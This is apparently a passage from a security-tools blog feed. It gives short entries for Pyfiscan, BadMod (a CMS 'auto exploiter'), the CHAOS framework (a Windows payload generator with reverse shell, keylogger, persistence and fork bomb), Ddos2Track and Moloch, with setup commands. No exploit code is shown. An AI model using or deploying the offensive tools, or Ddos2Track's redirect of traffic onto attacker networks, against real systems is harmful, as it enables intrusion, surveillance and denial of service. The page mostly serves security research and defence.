Joomla 1.5 is end-of-life since 2012-04-30
Joomla 1.6 is end-of-life since 2011-08-19. 1.6.x should be upgraded to 1.6.6 before moving to 1.7.x
Joomla 1.7 is end-of-life since 2012-02-24
Joomla 2.5
MediaWiki 1.18
MediaWiki 1.19 is end-of-life since 2015-04-25
MediaWiki 1.20
MediaWiki 1.21 is end-of-life since 2014-06-25
MediaWiki 1.22
MediaWiki 1.23 is end-of-life since 2017-05-31
MediaWiki 1.24
MediaWiki 1.25
MediaWiki 1.26 is end-of-life since 2016-11-20
MediaWiki 1.28 is end-of-life since 2017-11-01
ownCloud 4
ownCloud 5
ownCloud 6
ownCloud 7
ownCloud 8.0
ownCloud 8.1
ownCloud 8.2
SaurusCMS

Installation

apt-get install python python-pip libpython2.7-dev libyaml-dev git libyaml-dev
git clone https://github.com/fgeek/pyfiscan.git && cd pyfiscan
pip2 install -r requirements.lst

or you can use BlackArch Linux.

Notes

WordPress
- Announcing a secure SWFUpload fork
Joomla
- Upgrade should be done using "Extension manager -> Upgrade" in version 1.6.6 and later
- Release and support cycle
- Setup Security checklist
- Upgrading and migrating Joomla
- Joomla 2.x creates random SQL table prefix
- Joomla 3.x informs and shows user a button to remove installation-directory
- Creates ./configuration.php in installation
- Creates robots.txt, which contains word "Joomla"
SMF
- End of life of SMF 1.0
- Installer requests users with button to delete install.php
TikiWiki
MediaWiki
- End of Life of 1.18.x
Gallery
- Not installed when config.php is missing.
- http://codex.galleryproject.org/Gallery2:Security
- Upgrade using: http://example.org/gallery3/index.php/upgrade php index.php upgrade
phpBB (version unknown)
- Open installation is not a vulnerability since web-interface requests user to authenticate by inserting random data to file.
Coppermine
- Not installed when include/config.inc.php is missing.
Owncloud
- status.php outputs: {"installed":"true","version":"5.0.6","versionstring":"5.0.5","edition":""}
Piwigo
- Not installed if local/config/database.inc.php is missing.
Claroline
- Not installed when platform/conf/claro_main.conf.php is missing.
- Installation pages request user to remove claroline/install/ directory.

Download Pyfiscan

↧

BadMod - BadMod Detect Website CMS, Website Scanner & Auto Exploiter

April 1, 2018, 1:49 pm

≫ Next: CHAOS Framework v2.0 - Generate Payloads And Control Remote Windows Systems

≪ Previous: Pyfiscan - Web-Application Vulnerability And Version Scanner

Auto exploiter & get all server sites & bing dorker

Installation

git clone https://github.com/MrSqar-Ye/BadMod.git

BadMod tool
Detect website cms & website scanner =&> Auto exploiter

Exploit :
[!] Wordpress
[+] joomla
[!] drupal
[+] Cms made simple

Video

Download BadMod

↧

CHAOS Framework v2.0 - Generate Payloads And Control Remote Windows Systems

April 2, 2018, 6:35 am

≫ Next: Ddos2Track - An Script To Avoid HTTP Floods Attacks

≪ Previous: BadMod - BadMod Detect Website CMS, Website Scanner & Auto Exploiter

CHAOS allow generate payloads and control remote Windows systems.

Disclaimer

This project was created only for learning purpose.

THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.

Features

Reverse Shell
Download File
Upload File
Screenshot
Keylogger
Persistence
Open URL Remotely
Get Operating System Name
Run Fork Bomb

Tested On

Kali Linux - ROLLING EDITION

How To Use

# Install dependencies (You need Golang and UPX package installed)
$ apt install golang xterm git upx-ucl -y

# Clone this repository
$ git clone https://github.com/tiagorlampert/CHAOS.git

# Get and install external imports (requirement to screenshot)
$ go get github.com/kbinani/screenshot && go get github.com/lxn/win
$ go install github.com/kbinani/screenshot && go install github.com/lxn/win

# Maybe you will see the message "package github.com/lxn/win: build constraints exclude all Go files".
# It's occurs because the libraries are to windows systems, but it necessary to build the payload.

# Go into the repository
$ cd CHAOS

# Run
$ go run CHAOS.go

Video

Download CHAOS

↧

Ddos2Track - An Script To Avoid HTTP Floods Attacks

April 2, 2018, 2:10 pm

≫ Next: Moloch - An Open Source, Large Scale, Full Packet Capturing, Indexing, And Database System

≪ Previous: CHAOS Framework v2.0 - Generate Payloads And Control Remote Windows Systems

With this tool you can block HTTP Flood Attacks and analyze them with a honeypot.

THE TOOL SEND YOU AN ADVERTISING EMAIL AFTER DETECT A DDOS ATTACK!

First start the honeypot server (tools/analyze/logger.py).

Then start the detector (tools/detector/detector.sh) in another window.

If an attacker attack your server in preconfigured port (80), the detector will redirect all attacker requests to the honeypot during 5 seconds and next the attacker IP will be blocked.

You can modify options and active redir2attackers, this option allows you to redirect all trafic to attacker IP, so attacker will be DoSing its own network ;)

To view all DDoS Requests you can view the logs at '/tools/analyzer/ddos.log' To view all attackers IPs you can view it at 'tools/detector/attackers.txt'

INSTALLING

chmod 777 INSTALL.sh
sh INSTALL.sh

USING

./ddos2track

Follow instructions
Now wait for attackers :)

Download Ddos2Track

↧

Moloch - An Open Source, Large Scale, Full Packet Capturing, Indexing, And Database System

April 3, 2018, 5:25 am

≫ Next: GRR Rapid Response - Remote Live Forensics For Incident Response

≪ Previous: Ddos2Track - An Script To Avoid HTTP Floods Attacks

Moloch is an open source, large scale, full packet capturing, indexing, and database system. Moloch augments your current security infrastructure to store and index network traffic in standard PCAP format, providing fast, indexed access. An intuitive and simple web interface is provided for PCAP browsing, searching, and exporting. Moloch exposes APIs which allow for PCAP data and JSON formatted session data to be downloaded and consumed directly. Moloch stores and exports all packets in standard PCAP format allow you to also use your favorite PCAP ingesting tools, such as wireshark, during your analysis workflow.

Access to Moloch is protected by using HTTPS with digest passwords or by using an authentication providing web server proxy. All PCAPs are stored on the sensors and are only accessed using the Moloch interface or API. Moloch is not meant to replace an IDS but instead work along side them to store and index all the network traffic in standard PCAP format, providing fast access. Moloch is built to be deployed across many systems and can scale to handle tens of gigabits/sec of traffic. PCAP retention is based on available sensor disk space. Meta data retention is based on the Elasticsearch cluster scale. Both can be increased at anytime and are under your complete control.

Sessions Tab

SPI View Tab

Building
For advanced users, if you wish to build Moloch yourself run ./easybutton-build.sh --install which will download all the prerequisites, build, and install. make config can be used to perform a initial moloch configuration. The RPM & DEB files are much easier to deal with then building yourself and are recommended.

Components
The Moloch system is comprised of 3 components

capture - A threaded C application that monitors network traffic, writes PCAP formatted files to disk, parses the captured packets and sends meta data (SPI data) to elasticsearch.
viewer - A node.js application that runs per capture machine and handles the web interface and transfer of PCAP files.
elasticsearch - The search database technology powering Moloch.

Building and Installing
Moloch is a complex system to build and install manually. The following are rough guidelines.

Installing Elasticsearch

Recommended version 5.6.x for Moloch 0.18 and later. Download elasticsearch.: Important: At this time all development is done with elasticsearch 5.6.7.
Inside the installed$MOLOCH_PREFIX/db directory run the: db.pl http://A_ES_HOSTNAME:9200 init script.

Building Capture
Use the ./easybutton-build.sh script to download all thirdparty libraries and build moloch.

Building Viewer

Install Node.js version 6.x, currently 8.x is not supported. (Moloch versions before 0.18 required 4)
In the viewer directory run npm install.

Configuration

Make sure you download the latest freely available GeoIP and RIR files.
- GeoLiteCountry - Geographic IP data
- GeoIPASNum - Geographic Autonomous System (AS) number data
- ipv4-address-space - RIR assignments
Edit the config.ini file.
In the viewer directory, run addUser.js to add users. Pass the --admin flag if you want admin users that can edit users from the web site. This is a good test if elasticsearch and config.ini are setup correctly:
```
node addUser.js <userid> "<Friendly Name>" <password> [--admin]
```
Edit the db/daily.sh script, and set it up in the crontab on one machine.

Get it Running
If you've made it this far, you are awesome!
On each capture machine you need to run at least one moloch-capture and one moloch-viewer. Using make config will create startup files, or you can find the source files for make config in the release directory.

Test it Out
Point your browser to any Moloch instance at https://<hostname>:<port> and start tinkering!

Advanced Configuration
Hardware Requirements

Moloch is built to run across many machines for large deployments. For demo, small network, or home installations everything on a single machine is fine.
For larger installations please see the FAQ for recomended configurations.
The following are rough guidelines for capturing large amounts of data with high bit rates, obviously tailor for your specific situation. It is not recommended to run the capture and elasticsearchprocesses on the same machines for highly utilized GigE networks.

Moloch capture/viewer systems read FAQ Entry
Moloch elasticsearch systems read FAQ Entry

Example Configuration
Here is an example system setup for monitoring 8x GigE highly-utilized networks, with an average of ~5 Gigabit/sec, with ~7 days of pcap storage.

capture/viewer machines
- 5x HP Apollo 4200
- 64GB of memory
- 80TB of disk
- Running Moloch and Suricata
elasticsearch machines

10x HP DL380-G7
128GB of memory
6TB of disk
Each system running 1 node

Security Information

Ports Used

tcp 8005 - Moloch web interface
tcp 9200-920x (configurable upper limit) - Elasticsearch service ports
tcp 9300-930x (configurable upper limit) - Elasticsearch mesh connections

Important Considerations

Elasticsearch provides NO security, so iptables MUST be used allowing only Moloch machines to talk to the elasticsearch machines (ports 9200-920x) and for them to mesh connect (ports 9300-930x). An example with 3 ES machines 2 nodes each and a viewer only machine::
for ip in moloches1 moloches2 moloches3 molochvieweronly1; do
iptables -A INPUT -i eth0 -p tcp --dport 9300 -s $ip -j ACCEPT iptables -A INPUT -i eth0 -p tcp --dport 9200 -s $ip -j ACCEPT iptables -A INPUT -i eth0 -p tcp --dport 9301 -s $ip -j ACCEPT iptables -A INPUT -i eth0 -p tcp --dport 9201 -s $ip -j ACCEPT
done iptables -A INPUT -i eth0 -p tcp --dport 9300 -j DROP iptables -A INPUT -i eth0 -p tcp --dport 9200 -j DROP iptables -A INPUT -i eth0 -p tcp --dport 9301 -j DROP iptables -A INPUT -i eth0 -p tcp --dport 9201 -j DROP
Moloch machines should be locked down, however they need to talk to each other (port 8005), to the elasticsearch machines (ports 9200-920x), and the web interface needs to be open (port 8005).
Moloch viewer should be configured to use SSL.
- It's easiest to use a single certificate with multiple DNs.
- Make sure you protect the cert on the filesystem with proper file permissions.
It is possible to set up a Moloch viewer on a machine that doesn't capture any data that gateways all requests.
- It is also possible to place apache in front of moloch, so it can handle the authentication and pass the username on to moloch
- This is how we deploy it
A shared password stored in the Moloch configuration file is used to encrypt password hashes AND for inter-Moloch communication.

Make sure you protect the config file on the filesystem with proper file permissions.
Encrypted password hashes are used so a new password hash can not be inserted into elasticsearch directly in case it hasn't been secured.

FAQ
For answers to frequently asked questions, please see the FAQ.

Wiki
We use GitHub’s built-in wiki located at https://github.com/aol/moloch/wiki.

Upgrading
Upgrading is easy if using the RPM/DEB files.

Download and install the latest version, pay attention to any special instructions
You might need to upgrade the database with /data/moloch/db/db.pl http://localhost:9200 upgrade
Restart the moloch capture and viewer processes

If upgrading from source it is a manual process.

Update the moloch repository from github
Build the moloch system using "easybutton-build.sh"
Shut down currently running old capture and viewer processes
Optionally use "make install" to copy the new binaries and other items and/or push the new items to the capture hosts
Run "npm update" in the viewer directory if not using "make install"
Make sure ES is running and update the database using the "db/db.pl host:port upgrade" script
Start the new capture and viewer processes

Download Moloch

↧